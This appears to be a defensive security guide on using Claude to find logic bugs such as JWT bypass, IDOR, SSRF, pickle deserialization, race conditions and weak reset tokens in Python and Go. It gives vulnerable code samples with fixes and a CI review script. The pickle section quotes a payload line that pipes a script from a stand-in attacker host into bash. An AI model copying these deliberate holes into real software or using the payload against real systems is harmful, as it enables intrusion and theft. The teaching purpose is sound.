Claude for Application Security: Finding Logic Vulnerabilities in Source Code

Problem

Static application security testing (SAST) tools find pattern-based vulnerabilities effectively. Semgrep matches code against rules. CodeQL models data flow. Bandit flags dangerous Python function calls. These tools catch SQL injection when they see string concatenation in a query, XSS when they trace user input to HTML output, and hardcoded credentials when they match regex patterns.

But many of the vulnerabilities behind real breaches are not pattern-matchable. They are logic errors: an authentication check that can be bypassed by sending requests in a specific order, an authorisation function that checks the user’s role but not whether the user owns the resource, a URL parser that normalises differently from the downstream service (creating an SSRF vector), or a payment flow with a race condition that allows double-spending.

SAST tools struggle with these bugs because finding them requires understanding what the code is supposed to do, not just what it does. A tool can verify that a function calls authorize() before accessing a resource, but it cannot determine whether the authorisation check is semantically correct for the business logic. Does the check verify that user A owns resource B, or does it only verify that user A has the role “editor”? The difference is an IDOR vulnerability, and no SAST rule can distinguish between the two without understanding the application’s access model.

Claude reads code the way an experienced application security engineer does. It understands authentication flows, authorisation models, data validation patterns, and concurrency semantics. It can reason about what happens when functions are called in unexpected orders, when inputs have unusual shapes, and when multiple requests arrive simultaneously.

This article covers specific vulnerability patterns that Claude finds in Python and Go code, with real examples of bugs that SAST tools miss.

Target systems: Web applications and APIs written in Python (Django, Flask, FastAPI) and Go (net/http, Gin, Echo). The patterns apply to any language, but the examples focus on these two.

Threat Model

  • Adversary: External attackers probing the application’s API, authenticated users attempting to access other users’ data, and internal users attempting to escalate their privileges within the application.
  • Access level: Varies. Some bugs (authentication bypass) require no authentication. Others (IDOR, broken access control) require a valid low-privilege account. Race conditions require the ability to send concurrent requests.
  • Objective: Access other users’ data, perform actions as another user, bypass payment or rate limiting controls, or gain administrative access.
  • Blast radius: An authentication bypass exposes the entire application. An IDOR exposes every user’s data through a single compromised account. A race condition in a financial operation can cause direct monetary loss.

Configuration

Authentication Bypass Through Logic Errors

SAST tools verify that authentication middleware is present. Claude identifies when the middleware’s logic is flawed:

# auth/middleware.py
from functools import wraps
from flask import request, g, jsonify
import jwt

def require_auth(f):
    @wraps(f)
    def decorated(*args, **kwargs):
        token = request.headers.get("Authorization", "").replace("Bearer ", "")

        if not token:
            return jsonify({"error": "Missing token"}), 401

        try:
            payload = jwt.decode(token, options={"verify_signature": False})
            g.user_id = payload.get("sub")
            g.user_role = payload.get("role", "viewer")
        except jwt.DecodeError:
            return jsonify({"error": "Invalid token"}), 401

        return f(*args, **kwargs)
    return decorated

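A SAST tool that only checks for the presence of JWT decoding in an authentication decorator considers this correct (some rule sets do flag verify_signature: False specifically, but none reason about the role fallback). Claude identifies two critical issues: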

  1. Signature verification is disabled. The options={"verify_signature": False} parameter means any client can forge a JWT with arbitrary claims. An attacker creates a token with "role": "admin" and the server accepts it. This is not a missing auth check (which SAST would catch) but a misconfigured auth check that is present but ineffective.

  2. Default role assignment. The payload.get("role", "viewer") line silently assigns the “viewer” role when the role claim is absent. With signature verification disabled this hardly matters, because the attacker can set any role they want. But even with verification enabled, the fallback means that any validly signed token without a role claim (which can be legitimate in some OAuth flows) is granted viewer-level access instead of being rejected.
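
To make both findings concrete, here is a minimal stdlib-only sketch of an HS256 token being forged and then rejected. It is an illustration, not PyJWT: the helper names (sign_hs256, decode_unverified, decode_verified) and both keys are hypothetical, and expiry checks are omitted for brevity. In the decorator itself, the corresponding change would be to call jwt.decode(token, key, algorithms=["HS256"]) rather than disabling verification.

```python
import base64
import hashlib
import hmac
import json


def b64url(data: bytes) -> str:
    """Base64url-encode without padding, as JWTs do."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    """Decode base64url, restoring the stripped padding."""
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_hs256(claims: dict, key: bytes) -> str:
    """Build a compact HS256 token for the given claims."""
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    payload = b64url(json.dumps(claims).encode())
    sig = hmac.new(key, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{b64url(sig)}"


def decode_unverified(token: str) -> dict:
    """What the vulnerable decorator effectively does: trust the payload."""
    _header, payload, _sig = token.split(".")
    return json.loads(b64url_decode(payload))


def decode_verified(token: str, key: bytes) -> dict:
    """Check algorithm and signature, then require the claims we rely on."""
    header, payload, sig = token.split(".")
    if json.loads(b64url_decode(header)).get("alg") != "HS256":
        raise ValueError("unexpected algorithm")
    expected = hmac.new(key, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig)):
        raise ValueError("bad signature")
    claims = json.loads(b64url_decode(payload))
    # No silent default: a token without "sub" or "role" is rejected.
    if "sub" not in claims or "role" not in claims:
        raise ValueError("missing required claim")
    return claims


SERVER_KEY = b"hypothetical-server-key"  # assumption: loaded from a secret store
# The attacker does not know SERVER_KEY, so they sign with a key of their own.
forged = sign_hs256({"sub": "attacker", "role": "admin"}, b"attacker-chosen-key")
```

decode_unverified(forged) returns the attacker's admin claims, while decode_verified(forged, SERVER_KEY) raises ValueError. A token signed with the server key but lacking a role claim is also rejected rather than downgraded to “viewer”.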

Authorisation Check Gaps: IDOR and Broken Access Control

This is among the most common vulnerability classes, and one that SAST tools typically miss entirely:

# api/documents.py
from flask import Blueprint, request, g, jsonify
from models import Document, db

docs = Blueprint("docs", __name__)

@docs.route("/documents/<int:doc_id>", methods=["GET"])
@require_auth
def get_document(doc_id):
    doc = Document.query.get_or_404(doc_id)
    return jsonify(doc.to_dict())

@docs.route("/documents/<int:doc_id>", methods=["PUT"])
@require_auth
def update_document(doc_id):
    doc = Document.query.get_or_404(doc_id)

    if g.user_role not in ("editor", "admin"):
        return jsonify({"error": "Insufficient permissions"}), 403

    doc.title = request.json.get("title", doc.title)
    doc.content = request.json.get("content", doc.content)
    db.session.commit()
    return jsonify(doc.to_dict())

@docs.route("/documents/<int:doc_id>/share", methods=["POST"])
@require_auth
def share_document(doc_id):
    doc = Document.query.get_or_404(doc_id)

    if doc.owner_id != g.user_id:
        return jsonify({"error": "Only the owner can share"}), 403

    target_user = request.json.get("user_id")
    doc.shared_with.append(target_user)
    db.session.commit()
    return jsonify({"status": "shared"})

Claude identifies three distinct authorisation failures:

  1. GET endpoint has no ownership check. Any authenticated user can read any document by ID. The require_auth decorator verifies the user is logged in, but does not verify they own or have been granted access to the specific document. This is a classic IDOR. Semgrep cannot flag this because the endpoint does have authentication; what it lacks is authorisation.

  2. PUT endpoint checks role but not ownership. Any user with the “editor” role can modify any document, not just their own. The check should verify both role and ownership (or sharing). A SAST tool sees the role check and considers the endpoint protected.

  3. Inconsistent authorisation model. The share endpoint correctly checks doc.owner_id != g.user_id, but the GET and PUT endpoints do not. Claude recognises the inconsistency: one endpoint in the same file uses ownership checks while others do not.

The Claude prompt that catches these patterns:

SYSTEM_PROMPT = """You are reviewing application code for authorisation
vulnerabilities. For every endpoint that accesses a resource by ID:

1. Verify that the endpoint checks whether the authenticated user
   is allowed to access THAT SPECIFIC resource (not just whether
   they are authenticated or have a role)
2. Check for consistency: if one endpoint on a resource checks
   ownership, all endpoints on that resource should check ownership
3. Identify endpoints where role-based checks substitute for
   resource-level checks (role says "editor" but does not verify
   ownership of the specific resource)
4. Look for enumerable IDs (sequential integers) that make IDOR
   exploitation trivial"""
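
The resource-level check that the three findings call for could be centralised in a pair of helpers that every document endpoint uses. This is a minimal sketch in plain Python with no Flask or ORM dependency. The Doc dataclass and the can_read and can_write helpers are hypothetical, and the access model (owner, explicit share, or admin) is an assumption about what the application intends.

```python
from dataclasses import dataclass, field


@dataclass
class Doc:
    """Hypothetical stand-in for the Document model."""
    id: int
    owner_id: str
    shared_with: set = field(default_factory=set)


def _has_grant(doc: Doc, user_id: str) -> bool:
    """True if the user owns the document or it was shared with them."""
    return doc.owner_id == user_id or user_id in doc.shared_with


def can_read(doc: Doc, user_id: str, role: str) -> bool:
    """Reading requires a grant on this specific document (admins excepted)."""
    return role == "admin" or _has_grant(doc, user_id)


def can_write(doc: Doc, user_id: str, role: str) -> bool:
    """Writing requires the editor role AND a grant on this document."""
    if role == "admin":
        return True
    return role == "editor" and _has_grant(doc, user_id)
```

With helpers like these, the GET handler would return 403 (or 404, to avoid confirming that the ID exists) when can_read is false, and the PUT handler would do the same for can_write, so all three endpoints share one authorisation model.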

SSRF Through URL Parsing Inconsistencies

// handlers/proxy.go
package handlers

import (
    "fmt"
    "io"
    "net/http"
    "net/url"
    "strings"
)

var allowedHosts = map[string]bool{
    "api.partner.com":     true,
    "cdn.trusted-site.com": true,
}

func ProxyHandler(w http.ResponseWriter, r *http.Request) {
    targetURL := r.URL.Query().Get("url")
    if targetURL == "" {
        http.Error(w, "url parameter required", http.StatusBadRequest)
        return
    }

    parsed, err := url.Parse(targetURL)
    if err != nil {
        http.Error(w, "invalid URL", http.StatusBadRequest)
        return
    }

    // Block internal addresses
    if parsed.Hostname() == "localhost" ||
        parsed.Hostname() == "127.0.0.1" ||
        strings.HasPrefix(parsed.Hostname(), "10.") ||
        strings.HasPrefix(parsed.Hostname(), "192.168.") {
        http.Error(w, "internal addresses not allowed", http.StatusForbidden)
        return
    }

    // Check against allowlist
    if !allowedHosts[parsed.Hostname()] {
        http.Error(w, "host not allowed", http.StatusForbidden)
        return
    }

    resp, err := http.Get(targetURL)
    if err != nil {
        http.Error(w, fmt.Sprintf("proxy error: %v", err), http.StatusBadGateway)
        return
    }
    defer resp.Body.Close()

    io.Copy(w, resp.Body)
}

A SAST tool sees URL validation and an allowlist check. Claude identifies multiple bypass vectors:

  1. Validation and fetch use different inputs. The code validates the result of url.Parse but passes the original targetURL string to http.Get. Any difference between what was validated and what is fetched is a potential bypass (a parser differential). In this exact code http.Get re-parses the string with the same parser, so the gap is latent rather than directly exploitable: for http://api.partner.com@169.254.169.254/, url.Parse treats api.partner.com as userinfo, Hostname() returns 169.254.169.254, and the allowlist rejects it. The gap becomes exploitable as soon as the fetch moves to a different client, proxy, or downstream service that parses URLs differently. The robust fix is to fetch parsed.String() rather than the raw input and to reject URLs that carry userinfo.

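  2. Incomplete internal address blocking. The check blocks 10.* and 192.168.* but misses 172.16.0.0/12, the rest of 127.0.0.0/8, IPv6 loopback (::1), 0.0.0.0, and the AWS metadata IP 169.254.169.254. The allowlist that follows happens to reject these literal addresses, so the blocklist gives a false sense of coverage and fails as soon as the allowlist is loosened. More importantly, both checks look only at the hostname string: they do nothing against DNS rebinding, where an allowed hostname resolves to an internal IP after the check.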

  3. Redirect following. Go’s http.Get follows redirects by default. An attacker requests an allowed host that returns a 302 redirect to http://169.254.169.254/latest/meta-data/iam/security-credentials/. The allowlist check passes for the initial URL, but the actual request reaches the metadata service.
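
The address and parsing checks described above can be sketched with the Python standard library. This is an illustration of the technique in Python, not a drop-in replacement for the Go handler. The function names is_internal_address and checked_url are hypothetical, and the sketch assumes the caller applies is_internal_address to the IP actually resolved at connection time, which is what defeats DNS rebinding.

```python
import ipaddress
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"api.partner.com", "cdn.trusted-site.com"}


def is_internal_address(addr: str) -> bool:
    """Classify an IP literal using address ranges instead of string prefixes."""
    ip = ipaddress.ip_address(addr)
    # Unwrap IPv4-mapped IPv6 such as ::ffff:127.0.0.1 before classifying.
    mapped = getattr(ip, "ipv4_mapped", None)
    if mapped is not None:
        ip = mapped
    return (
        ip.is_private
        or ip.is_loopback
        or ip.is_link_local      # covers 169.254.169.254
        or ip.is_unspecified     # covers 0.0.0.0 and ::
        or ip.is_reserved
        or ip.is_multicast
    )


def checked_url(raw: str) -> str:
    """Validate a URL and return the string that should actually be fetched."""
    parts = urlsplit(raw)
    if parts.scheme not in ("http", "https"):
        raise ValueError("scheme not allowed")
    if parts.username is not None or parts.password is not None:
        raise ValueError("userinfo not allowed")
    if parts.hostname not in ALLOWED_HOSTS:
        raise ValueError("host not allowed")
    # Fetch the re-serialised form of what was validated, never the raw input.
    return parts.geturl()
```

The third finding needs a separate control: the HTTP client should either not follow redirects or re-run the same validation on every redirect target.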

Deserialization Vulnerabilities

# api/import_handler.py
import pickle
import base64
from flask import request, jsonify

@app.route("/api/import", methods=["POST"])
@require_auth
def import_data():
    encoded = request.json.get("data")
    if not encoded:
        return jsonify({"error": "data field required"}), 400

    try:
        data = pickle.loads(base64.b64decode(encoded))
    except Exception:
        return jsonify({"error": "invalid data format"}), 400

    # Process the imported data
    if isinstance(data, dict) and "records" in data:
        count = process_records(data["records"])
        return jsonify({"imported": count})

    return jsonify({"error": "unexpected data structure"}), 400

Semgrep and Bandit will both flag pickle.loads with untrusted input. This is one case where SAST tools do catch the issue. But Claude provides additional context that SAST tools do not:

  1. Exploitation is trivial. Claude explains that an attacker constructs a pickle payload that executes os.system("curl attacker.com/shell.sh | bash") on deserialization, before the isinstance check runs. The type check is irrelevant because the code executes during deserialization, not after.

  2. The require_auth decorator does not mitigate this. Since the auth check uses unverified JWTs (from the earlier example), any attacker can reach this endpoint. Even with proper authentication, any authenticated user can achieve remote code execution.

  3. Claude suggests the fix with context. Rather than just saying “don’t use pickle”, Claude recommends using json.loads for this use case since the code only needs dict data, or using hmac to sign serialized data if pickle is truly required for complex object graphs.
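
A small, harmless demonstration makes the first and third points concrete. The HarmlessPayload class below stands in for an attacker's object: its __reduce__ makes pickle.loads call eval on a fixed arithmetic string, where a real payload would name os.system. The load_records function is a hypothetical JSON-based replacement for the import path, and the expected shape (a dict with a "records" list) is taken from the handler above.

```python
import base64
import json
import pickle


class HarmlessPayload:
    """Stand-in for a malicious object; the callable runs during loads()."""

    def __reduce__(self):
        # pickle stores (callable, args) and invokes it on deserialization.
        return (eval, ("6 * 7",))


def load_records(encoded: str) -> list:
    """Parse base64-encoded JSON and validate its shape before use."""
    try:
        data = json.loads(base64.b64decode(encoded, validate=True))
    except ValueError as exc:  # covers bad base64, bad UTF-8, and bad JSON
        raise ValueError("invalid data format") from exc
    if not isinstance(data, dict) or not isinstance(data.get("records"), list):
        raise ValueError("unexpected data structure")
    return data["records"]


malicious = pickle.dumps(HarmlessPayload())
result = pickle.loads(malicious)  # eval has already run by the time this returns
```

Here result is the value eval returned, not a HarmlessPayload instance, which shows that the callable ran inside pickle.loads before any isinstance check could reject the data. Feeding the same bytes to load_records raises ValueError without executing anything.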

Race Conditions in Financial Operations

// handlers/transfer.go
package handlers

import (
    "database/sql"
    "encoding/json"
    "net/http"
)

type TransferRequest struct {
    FromAccount string  `json:"from_account"`
    ToAccount   string  `json:"to_account"`
    Amount      float64 `json:"amount"`
}

func TransferHandler(db *sql.DB) http.HandlerFunc {
    return func(w http.ResponseWriter, r *http.Request) {
        var req TransferRequest
        json.NewDecoder(r.Body).Decode(&req)

        // Check balance
        var balance float64
        err := db.QueryRow(
            "SELECT balance FROM accounts WHERE id = $1",
            req.FromAccount,
        ).Scan(&balance)
        if err != nil {
            http.Error(w, "account not found", http.StatusNotFound)
            return
        }

        if balance < req.Amount {
            http.Error(w, "insufficient funds", http.StatusBadRequest)
            return
        }

        // Debit source account
        _, err = db.Exec(
            "UPDATE accounts SET balance = balance - $1 WHERE id = $2",
            req.Amount, req.FromAccount,
        )
        if err != nil {
            http.Error(w, "transfer failed", http.StatusInternalServerError)
            return
        }

        // Credit destination account
        _, err = db.Exec(
            "UPDATE accounts SET balance = balance + $1 WHERE id = $2",
            req.Amount, req.ToAccount,
        )
        if err != nil {
            // Attempt to rollback the debit
            db.Exec(
                "UPDATE accounts SET balance = balance + $1 WHERE id = $2",
                req.Amount, req.FromAccount,
            )
            http.Error(w, "transfer failed", http.StatusInternalServerError)
            return
        }

        json.NewEncoder(w).Encode(map[string]string{"status": "completed"})
    }
}

SAST tools typically do not flag this code. There is no injection, no hardcoded secret, no unsafe function call. Claude identifies two critical issues:

  1. TOCTOU race condition. The balance check and the debit are separate operations with no transaction or locking. An attacker sends 10 concurrent transfer requests for their full balance. All 10 requests read the same balance, all 10 pass the check, and all 10 execute the debit. The account goes negative. With a $1,000 balance, the attacker transfers $10,000 to accounts they control.

  2. Non-atomic transfer with manual rollback. The debit and credit are separate SQL statements. If the credit fails, the code attempts to roll back the debit with another separate statement. But if the rollback also fails (network error, database restart), the money disappears: debited from the source but never credited to the destination and never rolled back. This should use a database transaction with BEGIN/COMMIT/ROLLBACK.

Claude provides the fix:

func TransferHandler(db *sql.DB) http.HandlerFunc {
    return func(w http.ResponseWriter, r *http.Request) {
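        var req TransferRequest
        if err := json.NewDecoder(r.Body).Decode(&req); err != nil {
            http.Error(w, "invalid request body", http.StatusBadRequest)
            return
        }
        // Reject zero or negative amounts; a negative amount would
        // reverse the direction of the transfer.
        if req.Amount <= 0 {
            http.Error(w, "amount must be positive", http.StatusBadRequest)
            return
        }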

        tx, err := db.Begin()
        if err != nil {
            http.Error(w, "internal error", http.StatusInternalServerError)
            return
        }
        defer tx.Rollback()

        // Lock the source row and check balance atomically
        var balance float64
        err = tx.QueryRow(
            "SELECT balance FROM accounts WHERE id = $1 FOR UPDATE",
            req.FromAccount,
        ).Scan(&balance)
        if err != nil {
            http.Error(w, "account not found", http.StatusNotFound)
            return
        }

        if balance < req.Amount {
            http.Error(w, "insufficient funds", http.StatusBadRequest)
            return
        }

        _, err = tx.Exec(
            "UPDATE accounts SET balance = balance - $1 WHERE id = $2",
            req.Amount, req.FromAccount,
        )
        if err != nil {
            http.Error(w, "transfer failed", http.StatusInternalServerError)
            return
        }

        _, err = tx.Exec(
            "UPDATE accounts SET balance = balance + $1 WHERE id = $2",
            req.Amount, req.ToAccount,
        )
        if err != nil {
            http.Error(w, "transfer failed", http.StatusInternalServerError)
            return
        }

        if err := tx.Commit(); err != nil {
            http.Error(w, "transfer failed", http.StatusInternalServerError)
            return
        }

        json.NewEncoder(w).Encode(map[string]string{"status": "completed"})
    }
}
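
An alternative to row locking is to fold the balance check into the debit itself, so that check and act are a single statement. The sketch below shows that conditional-update pattern in Python, with sqlite3 standing in for the production database. The transfer function, the accounts schema, and the use of integer cents instead of floating-point amounts are assumptions made for illustration.

```python
import sqlite3


def transfer(conn: sqlite3.Connection, src: str, dst: str, amount_cents: int) -> bool:
    """Move funds atomically; return False if the source cannot cover the amount."""
    if amount_cents <= 0:
        raise ValueError("amount must be positive")
    # "with conn" commits if the block succeeds and rolls back on an exception.
    with conn:
        # The balance check is part of the UPDATE, so no other request can
        # slip in between the check and the debit.
        cur = conn.execute(
            "UPDATE accounts SET balance = balance - ? "
            "WHERE id = ? AND balance >= ?",
            (amount_cents, src, amount_cents),
        )
        if cur.rowcount != 1:
            return False  # unknown source account or insufficient funds
        cur = conn.execute(
            "UPDATE accounts SET balance = balance + ? WHERE id = ?",
            (amount_cents, dst),
        )
        if cur.rowcount != 1:
            # Raising here rolls back the debit along with everything else.
            raise LookupError("destination account not found")
    return True
```

With this shape, ten concurrent requests for the full balance result in one successful debit and nine that match zero rows. Like the Go fix above, it still needs a check that the authenticated caller is allowed to debit the source account.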

Unsafe Use of Cryptographic Primitives

# auth/tokens.py
import hashlib
import time
import os

def generate_reset_token(user_id: str) -> str:
    """Generate a password reset token."""
    timestamp = str(int(time.time()))
    raw = f"{user_id}:{timestamp}:{os.environ.get('SECRET_KEY', 'dev-secret')}"
    token = hashlib.md5(raw.encode()).hexdigest()
    return f"{timestamp}:{token}"

def verify_reset_token(user_id: str, token: str, max_age: int = 3600) -> bool:
    """Verify a password reset token."""
    parts = token.split(":")
    if len(parts) != 2:
        return False

    timestamp, hash_value = parts
    try:
        token_time = int(timestamp)
    except ValueError:
        return False

    if time.time() - token_time > max_age:
        return False

    expected_raw = f"{user_id}:{timestamp}:{os.environ.get('SECRET_KEY', 'dev-secret')}"
    expected = hashlib.md5(expected_raw.encode()).hexdigest()
    return hash_value == expected

Bandit flags hashlib.md5 as insecure. That is true but is actually the least critical issue here. Claude identifies the deeper problems:

  1. Timing attack on token comparison. The == operator for string comparison returns early on the first mismatched character. Because the expected hash is fixed for a given user and timestamp, an attacker who can measure response times precisely enough can, in principle, recover the token one character at a time. The fix is to use hmac.compare_digest() for constant-time comparison.

  2. Predictable token inputs. The token is derived from user_id (known to the attacker), timestamp (guessable to within a few seconds), and SECRET_KEY. If the secret key is weak or uses the fallback dev-secret, the attacker can compute valid tokens without any brute-forcing.

  3. Fallback secret key. The os.environ.get('SECRET_KEY', 'dev-secret') pattern means that if the environment variable is not set (a common deployment error), every token is predictable. A SAST tool would need to trace environment variable configuration across deployment manifests to catch this, which SAST tools generally do not do.

  4. MD5 is not the real problem. Even replacing MD5 with SHA-256 does not fix the fundamental issue. The token construction is deterministic from guessable inputs. The correct approach is to use secrets.token_urlsafe() to generate a random token and store it server-side, or use HMAC with a strong key and proper constant-time comparison.
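
The random-token approach from the last point might look like the following sketch. The in-memory _RESET_TOKENS dict is a hypothetical stand-in for a database table, the now parameter exists only to make expiry testable, and single-use semantics are an added assumption rather than something the original code specifies.

```python
import hashlib
import hmac
import secrets
import time
from typing import Optional

# Hypothetical store: user_id -> (sha256 hex digest of token, issue time).
_RESET_TOKENS: dict = {}


def issue_reset_token(user_id: str, now: Optional[float] = None) -> str:
    """Create an unguessable token; only its hash is kept server-side."""
    token = secrets.token_urlsafe(32)
    digest = hashlib.sha256(token.encode()).hexdigest()
    _RESET_TOKENS[user_id] = (digest, time.time() if now is None else now)
    return token


def verify_reset_token(user_id: str, token: str, max_age: int = 3600,
                       now: Optional[float] = None) -> bool:
    """Check the token in constant time, enforce expiry, and consume it."""
    record = _RESET_TOKENS.get(user_id)
    if record is None:
        return False
    digest, issued_at = record
    current = time.time() if now is None else now
    if current - issued_at > max_age:
        del _RESET_TOKENS[user_id]
        return False
    candidate = hashlib.sha256(token.encode()).hexdigest()
    if not hmac.compare_digest(candidate, digest):
        return False
    del _RESET_TOKENS[user_id]  # single use: a token cannot be replayed
    return True
```

Because the token comes from secrets.token_urlsafe, nothing about it can be derived from the user ID or the time of the request, and there is no secret key whose absence could silently weaken it.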

Integration: Claude Code Review in CI

# scripts/appsec-review.py
import anthropic
import sys

SYSTEM_PROMPT = """You are an application security engineer reviewing
source code for logic vulnerabilities. Focus on issues that SAST
tools cannot detect:

1. Authentication bypass through logic errors (not missing auth)
2. Authorisation gaps: endpoints that check authentication but not
   resource ownership (IDOR)
3. SSRF: URL validation that can be bypassed through parsing
   differences, redirects, or DNS rebinding
4. Race conditions: check-then-act patterns without locks or
   transactions, especially in financial or state-changing operations
5. Cryptographic issues: timing attacks, predictable tokens,
   weak key derivation, ECB mode, static IVs
6. Deserialization of untrusted data
7. Business logic errors: discount stacking, negative quantities,
   integer overflow in currency calculations

For each finding, provide:
- The specific code location
- Why SAST tools miss it
- The attack scenario (how an attacker exploits it)
- The fix (with code)

Do not flag issues that SAST tools already catch well (SQL injection
via string formatting, XSS via template rendering, hardcoded secrets).
Focus on the logic layer."""

def review_file(filepath: str) -> str:
    with open(filepath) as f:
        content = f.read()

    client = anthropic.Anthropic()
    message = client.messages.create(
        model="claude-sonnet-4-6",
        max_tokens=4096,
        system=SYSTEM_PROMPT,
        messages=[{
            "role": "user",
            "content": f"Review this file for logic vulnerabilities:\n\n"
                       f"File: {filepath}\n```\n{content}\n```"
        }]
    )
    return message.content[0].text

if __name__ == "__main__":
    for filepath in sys.argv[1:]:
        print(f"\n{'='*60}")
        print(f"Reviewing: {filepath}")
        print(f"{'='*60}\n")
        print(review_file(filepath))
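
In CI, the list of files passed to this script would usually be narrowed to security-relevant paths first. The helper below is a minimal sketch of that filter. The name select_security_relevant and the SECURITY_PATTERNS globs are assumptions based on the directories used in this article, and should be adapted to the project layout.

```python
from fnmatch import fnmatchcase

# Hypothetical path patterns; "*" in fnmatch also matches "/" characters.
SECURITY_PATTERNS = ("auth/*", "api/*", "handlers/*", "*middleware*")


def select_security_relevant(paths: list) -> list:
    """Keep only the changed files that match a security-relevant pattern."""
    return [
        path for path in paths
        if any(fnmatchcase(path, pattern) for pattern in SECURITY_PATTERNS)
    ]
```

The input list could come from git diff --name-only against the target branch, with the filtered result passed as arguments to the review script.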

Expected Behaviour

After integrating Claude-based application security review:

  • Logic vulnerabilities are caught before merge. Authentication bypass, IDOR, race conditions, and cryptographic misuse are identified in pull requests alongside SAST results.
  • SAST findings are contextualised. When Semgrep flags pickle.loads, Claude explains the full exploit chain including how the attacker reaches the endpoint and what they can achieve.
  • False positive rate is lower than SAST alone. Claude can recognise when a pattern is safe in context (e.g., pickle.loads on data from a trusted internal queue with HMAC verification) and is less likely to flag it.
  • Developers receive actionable explanations. Instead of “insecure hash algorithm detected”, developers get “this password reset token can be forged by an attacker who knows the user’s ID because the timestamp is guessable and the fallback secret key is ‘dev-secret’”.

Verification:

# Review authentication and authorisation code
claude "Review auth/ and api/ directories for authentication bypass
and authorisation gaps. For each endpoint, verify that the
authenticated user is authorised to access the specific resource
being requested, not just authenticated."

# Check for race conditions in state-changing operations
claude "Review handlers/ for race conditions. Look for any pattern
where a value is read, checked, and then modified in separate
database operations without a transaction or lock."

# Test against known-vulnerable code samples
python3 scripts/appsec-review.py \
  test/vulnerable/auth_bypass.py \
  test/vulnerable/idor.py \
  test/vulnerable/race_condition.go

Trade-offs

| Decision | Benefit | Cost |
| --- | --- | --- |
| Review only security-relevant files (auth, handlers, middleware) | Focused analysis, lower cost | May miss vulnerabilities in utility or helper code |
| Include full application context (models, routes, middleware) | Claude understands the full request lifecycle | Large context window usage, higher cost |
| Run Claude alongside SAST, not instead of it | Comprehensive coverage: SAST for patterns, Claude for logic | Two tools to maintain, two sets of results to review |
| Focus Claude on logic bugs only | Avoids duplicate findings with SAST | Requires clear prompt engineering to avoid overlap |
| Review every PR | Catches issues early | API cost scales with PR volume; most PRs have no security relevance |

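API cost estimate: Reviewing 500 lines of application code costs approximately $0.02-0.05 with Claude Sonnet. A focused review of authentication and authorisation code (typically 1,000-3,000 lines) costs $0.05-0.15. At 15 security-relevant PRs per week (about 65 per month), a single review pass per PR comes to roughly $3-10 per month. Re-reviewing on every push, or including full application context, multiplies that figure accordingly.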

Accuracy considerations: Claude’s logic vulnerability detection tends to have a lower false positive rate than SAST tools (approximately 5-10% vs. 30-60% for SAST; treat these as rough estimates that vary with the codebase and rule set) but a higher false negative rate for pattern-based vulnerabilities. This is why running both tools together is the recommended approach.

Failure Modes

| Failure | Symptom | Detection | Response |
| --- | --- | --- | --- |
| Missed IDOR | Claude does not flag an endpoint that accesses resources by ID without ownership checks | Penetration test or bug bounty report identifies the IDOR | Add the specific code pattern to the system prompt as an explicit check |
| False positive on intentional design | Claude flags a public API endpoint as missing authentication when it is intentionally unauthenticated | Developer marks finding as false positive; pattern recurs | Maintain a list of intentionally public endpoints in the system prompt |
| Incorrect fix suggestion | Claude suggests a fix that introduces a new vulnerability (e.g., a lock that causes deadlock) | Code review of Claude’s suggestion catches the issue | Always review Claude’s fix suggestions with the same scrutiny as any code change |
| Language version confusion | Claude suggests a fix using a library function that does not exist in the project’s language version | Build fails when applying the fix | Include language and framework versions in the review prompt |
| Context window limits on large files | A 5,000-line file exceeds practical context limits; analysis is incomplete | Review output does not cover the entire file | Split large files for review or use Claude to review specific functions |
| Hallucinated vulnerability | Claude describes a bug that does not exist in the code (e.g., references a function that is not called) | Manual code review shows the described bug is not present | Always verify Claude’s findings against the actual code before opening a ticket |
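
For the large-file case, one way to split a Python source file for review is by top-level definition, keeping decorators attached so that checks such as @require_auth stay visible to the reviewer. This is a minimal sketch using the standard ast module. The function name split_top_level_defs is hypothetical, the approach applies only to Python sources, and module-level context such as imports and globals would need to be supplied separately.

```python
import ast


def split_top_level_defs(source: str) -> list:
    """Return (name, source_text) for each top-level function or class."""
    tree = ast.parse(source)
    lines = source.splitlines()
    chunks = []
    for node in tree.body:
        if isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef, ast.ClassDef)):
            # Start at the first decorator, if any, so it is not lost.
            start = min([node.lineno] + [d.lineno for d in node.decorator_list])
            chunks.append((node.name, "\n".join(lines[start - 1:node.end_lineno])))
    return chunks


SAMPLE = '''import os

@require_auth
def get_document(doc_id):
    return doc_id

def helper():
    return 1
'''

chunks = split_top_level_defs(SAMPLE)
```

Each chunk can then be sent as its own review request, at the cost of losing some cross-function context that a whole-file review would have.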

When to Consider a Managed Alternative

Transition point: When your organisation has more than 50 developers committing to security-sensitive applications, needs compliance evidence for code review (SOC2, PCI-DSS), or requires integration with issue trackers and developer workflows.

What managed providers handle:

  • Snyk: Snyk Code provides SAST with low false positive rates and developer-friendly remediation guidance. Snyk integrates with IDEs, PRs, and CI/CD pipelines. Use Snyk for the pattern-based detection layer that runs on every commit.
  • Semgrep: Custom rule engine that allows writing organisation-specific detection rules. When Claude identifies a recurring vulnerability pattern in your codebase, write a Semgrep rule to catch future instances automatically. Semgrep handles the deterministic detection; Claude handles the initial discovery.

What Claude handles that managed tools do not: Business logic vulnerability detection, race condition identification through code flow analysis, IDOR detection through authorisation model reasoning, and contextual explanation of why a specific code pattern is dangerous in the application’s context. No SAST tool reasons about whether an authorisation check is semantically correct for the business logic.

The optimal stack: Semgrep or Snyk Code for pattern-based SAST on every commit + Claude for logic-layer review on security-relevant PRs + manual penetration testing quarterly. SAST catches the known patterns, Claude catches the logic bugs, and manual testing validates both.